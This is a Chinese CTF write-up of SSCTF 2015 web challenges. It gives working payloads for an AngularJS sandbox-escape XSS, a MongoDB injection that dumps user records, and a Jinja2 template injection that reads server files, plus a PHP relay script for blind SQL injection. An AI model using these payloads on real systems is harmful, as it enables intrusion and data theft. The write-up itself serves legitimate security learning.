前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >ssctf2015_writeup

ssctf2015_writeup

作者头像
LoRexxar
发布2023-02-21 14:22:59
1900
发布2023-02-21 14:22:59
举报
文章被收录于专栏:LoRexxar's BlogLoRexxar's Blog

刚开学没什么事打了2月2728的ssctf,结果被web刷的一愣一愣的,看了出来的writeup才感觉是点儿蛋疼的,整理下writeup看看…

WEB

web1 Up!Up!Up!(文件上传)

看了出来的writeup,我才第一次知道上传过滤还能这么写。。。 原洞是来自http://www.wooyun.org/bugs/wooyun-2015-0125982

看着真的是叼,把那个content-type大小写改下就过了…

Can You Hit Me?(augularjs xss)

打开是这样的:

稍微测试下发现对script,alert,on的过滤都是替换一次,甚至大小写都没有过滤,有点儿傻的,但是却把<这样的替换为_,于是想了一天也没想明白怎么过。

找到一篇博客http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

结果发现augularjs可以不需要尖括号,找到一个payload:

代码语言:javascript
复制
{{
'a'.constructor.prototype.charAt=[].join;
eval('x=1} } };alert(1)//');
}}

稍微改下

代码语言:javascript
复制
xss={{%27a%27.coonnstructor.prototype.charAt=[].join;$evevalal(%22m=1)%20}%20};alalertert(123)//%22};}}

Legend?Legend!(mongdb注入)

测试下发现sql注不动,那么估计就是mongdb了,那么又是这篇文章了: http://drops.wooyun.org/tips/3939 payload:

代码语言:javascript
复制
5%27});return%20{title:tojson(db.user.find()[0])}//

注到一个user数据,登陆下,找找就能找到flag了。

Flag-Man

从这里就没点开看了,那么就先贴上别人的writeup吧。

登录github授权,然后发现在Your Profile中的Name是控制/users中的name

Name是可控制的,遍历目录 最后读取文件 得到flag http://drops.wooyun.org/web/13057

payload:

代码语言:javascript
复制
{%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__ == 'catch_warnings'%}{{c.__init__.func_globals['linecache'].__dict__['__builtins__'].open('ssctf.py').read()}}{%endif%}{%endfor%}

访问user目录get flag

AFSRC-Market

注入在add_cart.php页面,提交id=xxx cost为0 判断有注入,但是不能直接得到数据。于是中转注入

代码语言:javascript
复制
 $opts = array ('http' => array ('header'=>'Cookie: PHPSESSID=1;'));
$context = stream_context_create($opts);
$html = file_get_contents('http://edb24e7c.seclover.com/add_cart.php?id=0x'.bin2hex($_GET[x]), false, $context);
$html = file_get_contents('http://edb24e7c.seclover.com/userinfo.php', false, $context);
preg_match('/cost: (.*?)<\/p>/is',$html,$res);
echo $res[1]==0 ? 0 : 1;

得到提示

到这里就跑吧,爆破salt。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2016/03/01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • WEB
    • web1 Up!Up!Up!(文件上传)
      • Can You Hit Me?(augularjs xss)
        • Legend?Legend!(mongdb注入)
          • Flag-Man
            • AFSRC-Market
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档